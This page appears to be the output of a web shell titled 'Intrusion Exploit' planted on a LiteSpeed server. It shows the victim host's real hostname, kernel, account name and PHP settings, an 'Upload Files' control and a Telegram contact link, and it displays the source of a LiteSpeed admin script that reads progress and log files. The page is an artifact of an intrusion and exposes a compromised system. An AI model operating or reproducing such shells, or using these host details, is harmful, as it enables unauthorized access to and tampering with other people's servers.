Intrusion Exploit
Server: LiteSpeed
System: Linux cisadane.iixcp.rumahweb.net 5.14.0-427.42.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Nov 1 14:58:02 EDT 2024 x86_64
User: lenf4658 (1805)
PHP: 8.4.19
Disabled: NONE
$ pwd: /usr/local/lsws/admin/html.6.3.1/utility/build_php/
Upload Files
File: //usr/local/lsws/admin/html.6.3.1/utility/build_php/buildProgress.php
<?php
require_once('../../includes/auth.php');

include_once( 'buildconf.inc.php' );

$progress_file = $_SESSION['progress_file'];
$log_file = $_SESSION['log_file'];

$progress = htmlspecialchars(file_get_contents($progress_file));
echo $progress;

echo "\n**LOG_DETAIL** retrieved from $log_file\n";
$log = htmlspecialchars(file_get_contents($log_file));
echo $log;
@ Telegram